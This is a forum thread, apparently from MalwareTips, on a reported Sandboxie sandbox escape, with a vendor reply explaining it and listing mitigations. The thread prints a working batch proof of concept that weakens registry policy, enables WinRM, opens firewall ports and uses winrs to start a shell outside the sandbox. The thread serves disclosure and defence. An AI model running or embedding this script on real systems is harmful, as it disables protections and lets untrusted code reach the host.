[News] 0 day discovered in Sandboxie
- Thread starter Aura
- Start date
- Status
interesting, take your time , we are not hurry
And if I remember well what he did, it was with Powershell too as Powershell commands were involved.
Just thought I'd drop by and tell everyone an update.
And when trying the vulnerability when testing the new, beta version:
And lastly, the source code (for those who want to analyse):
@echo off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd /c "winrm quickconfig -quiet -force" >nul
cmd /c "winrm create winrm/config/listener?Address=*+Transport=HTTP" >nul
netsh firewall add portopening TCP 80 "Windows Remote Management" >nul
netsh firewall add portopening TCP 137 "a1" >nul
ping 127.0.0.1 -n 3 -w 5000 >nul
winrs -r:127.0.0.1 "start cmd"
pause
And when trying the vulnerability when testing the new, beta version:
And lastly, the source code (for those who want to analyse):
@echo off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd /c "winrm quickconfig -quiet -force" >nul
cmd /c "winrm create winrm/config/listener?Address=*+Transport=HTTP" >nul
netsh firewall add portopening TCP 80 "Windows Remote Management" >nul
netsh firewall add portopening TCP 137 "a1" >nul
ping 127.0.0.1 -n 3 -w 5000 >nul
winrs -r:127.0.0.1 "start cmd"
pause
Thank you, everyone.
I'll be trying my hand at the new, beta version.
I'll be trying my hand at the new, beta version.
- Aug 9, 2014
- 32
Thanks, I'm a big SBIE fan. Despite your findings I still think the odds are stacked against an ITW bypass compared to the myriad of AV bypasses seen everyday but appreciate the work your doing.
It's the type of non-fanboy testing sadly missing for a long time. Hopefully Invincea have the resources to be pro-active about the product in a way Tzuk never could be and close of gaps before guys like yourself can findt hem.
Keep up the good work.
Chris
It's the type of non-fanboy testing sadly missing for a long time. Hopefully Invincea have the resources to be pro-active about the product in a way Tzuk never could be and close of gaps before guys like yourself can findt hem.
Keep up the good work.
Chris
I'm an employee of Invincea and posting this message on behalf of the Sandboxie Team...
Thank you, IcYSeptember, for bringing this to our attention! We at Sandboxie/Invincea take these matters seriously and investigate all feedback to provide a safe computing environment for our users.
In our analysis of the provided information, the user takes advantage of the default configuration of an existing Microsoft-provided Windows Remote Management service (WS-Management) running on the Windows host. He is using an administrator-privileged client (winrs) running in the sandbox to connect to the host itself over TCP to the management service (winrm) running on the host, thereby creating a sandbox to host communication. (Windows Remote Management service is a Microsoft-provided service that allows for remote access to another host to perform management functions.) As you can imagine, any remote management service can be used to perform both positive and negative actions on the host itself.
This access does not take advantage of a vulnerability (0-day or other) or a defect in Sandboxie in how it isolates the file system, registry, or running processes from the host.
In fact, there are many legitimate use cases for sandboxed processes to communicate with a network service on the same host. Additionally as a point of concern, this type of remote management access can be performed completely outside of Sandboxie whereby one host on a network can connect to the Windows Remote Management service running on a second host on the same network, for example, at a public WiFi hotspot.
We recommend safe configurations of your PC’s operating system and running applications working in conjunction with the isolation protection offered by Sandboxie. Any of these configurations would block the access that was demonstrated:
- Disable default services on your PC that you do not use or which presents a security risk.
- If remote management is needed, configure the service to request a user-provided strong password.
- Install and configure a third-party firewall to block localhost-initiated network communications to local services (on loopback and the active network adapter)
We did implement a control in the just-released Sandboxie 4.13 beta version that specifically blocks running the winrs client in the sandbox altogether, among other edge cases we found in our analysis to provide even more protection. We are continuously evaluating where we can have Sandboxie implement security control over the risk created by default Windows services to better protect our users.
Thank you for bringing this to our attention and safe browsing!
Sandboxie Team
Thank you, IcYSeptember, for bringing this to our attention! We at Sandboxie/Invincea take these matters seriously and investigate all feedback to provide a safe computing environment for our users.
In our analysis of the provided information, the user takes advantage of the default configuration of an existing Microsoft-provided Windows Remote Management service (WS-Management) running on the Windows host. He is using an administrator-privileged client (winrs) running in the sandbox to connect to the host itself over TCP to the management service (winrm) running on the host, thereby creating a sandbox to host communication. (Windows Remote Management service is a Microsoft-provided service that allows for remote access to another host to perform management functions.) As you can imagine, any remote management service can be used to perform both positive and negative actions on the host itself.
This access does not take advantage of a vulnerability (0-day or other) or a defect in Sandboxie in how it isolates the file system, registry, or running processes from the host.
In fact, there are many legitimate use cases for sandboxed processes to communicate with a network service on the same host. Additionally as a point of concern, this type of remote management access can be performed completely outside of Sandboxie whereby one host on a network can connect to the Windows Remote Management service running on a second host on the same network, for example, at a public WiFi hotspot.
We recommend safe configurations of your PC’s operating system and running applications working in conjunction with the isolation protection offered by Sandboxie. Any of these configurations would block the access that was demonstrated:
- Disable default services on your PC that you do not use or which presents a security risk.
A good list for Windows 7 is available here (http://www.blackviper.com/service-c...dows-7-service-pack-1-service-configurations/), and similar configurations apply to other Windows versions.
- If remote management is needed, configure the service to request a user-provided strong password.
- Install and configure a third-party firewall to block localhost-initiated network communications to local services (on loopback and the active network adapter)
We did implement a control in the just-released Sandboxie 4.13 beta version that specifically blocks running the winrs client in the sandbox altogether, among other edge cases we found in our analysis to provide even more protection. We are continuously evaluating where we can have Sandboxie implement security control over the risk created by default Windows services to better protect our users.
Thank you for bringing this to our attention and safe browsing!
Sandboxie Team
thank you to took the time to explain us the "vulnerability" in a detailed way.
Btw, welcome at MalwareTips
Btw, welcome at MalwareTips
- May 12, 2014
- 59
More will be incoming since this new company took it over, so the main focus of a tight knit community turns into a big business and making money
- Aug 14, 2014
- 66
IcY, grate job. I'm glad you decide to use it for the good instead of selling the vulnerability or something.
- Sep 30, 2012
- 667
- Status
Similar threads
![[correlate]](/data/avatars/s/79/79653.jpg?1556985072){kind=avatar}
